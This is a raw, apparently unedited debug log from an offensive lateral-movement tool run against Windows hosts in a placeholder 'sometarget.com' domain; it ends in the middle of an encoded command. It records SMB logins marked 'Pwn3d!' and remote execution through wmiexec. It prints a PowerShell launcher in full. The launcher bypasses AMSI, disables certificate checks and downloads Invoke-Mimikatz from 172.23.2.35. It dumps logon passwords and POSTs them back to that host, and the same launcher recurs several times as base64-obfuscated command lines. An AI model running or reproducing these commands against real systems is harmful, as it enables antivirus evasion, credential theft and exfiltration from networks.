DEBUG StringBinding chosen: ncacn_ip_tcp:ACTSM1.sometarget.com[49154] | |
MIMIKATZ 172.23.2.95 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Target system is CIVRTST01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CIVRTST01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CIVRTST01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CIVRTST01.sometarget.com[49154] | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
MIMIKATZ CIVRTST02.sometarget.com 445 CIVRTST02 [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB TLPORTAL.sometarget.com 445 TLPORTAL [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ 172.23.3.61 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ CCOGNOS01.sometarget.com 445 CCOGNOS01 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv SN -;sv HG ec;sv hZ ((gv SN).value.toString()+(gv HG).value.toString());powershell (gv hZ).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Cx -;sv vZ ec;sv Xf ((gv Cx).value.toString()+(gv vZ).value.toString());powershell (gv Xf).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Target system is TLPORTAL.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\TLPORTAL[\\PIPE\\atsvc] | |
DEBUG StringBinding: TLPORTAL[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:TLPORTAL.sometarget.com[49154] | |
MIMIKATZ CIVRTST01.sometarget.com 445 CIVRTST01 [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACCOG01.sometarget.com 445 ACCOG01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.23.3.50 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ ACTSMAD.sometarget.com 445 ACTSMAD [+] Executed launcher | |
MIMIKATZ 172.28.2.68 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CDC03.sometarget.com 445 CDC03 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Zw -;sv cV ec;sv DU ((gv Zw).value.toString()+(gv cV).value.toString());powershell (gv DU).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Target system is CDC03.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CDC03[\\PIPE\\atsvc] | |
DEBUG StringBinding: CDC03[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CDC03.sometarget.com[49154] | |
DEBUG Target system is ACCOG01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACCOG01[\\PIPE\\atsvc] | |
DEBUG StringBinding: accog01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACCOG01.sometarget.com[49154] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv kQ -;sv wq ec;sv eP ((gv kQ).value.toString()+(gv wq).value.toString());powershell (gv eP).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAG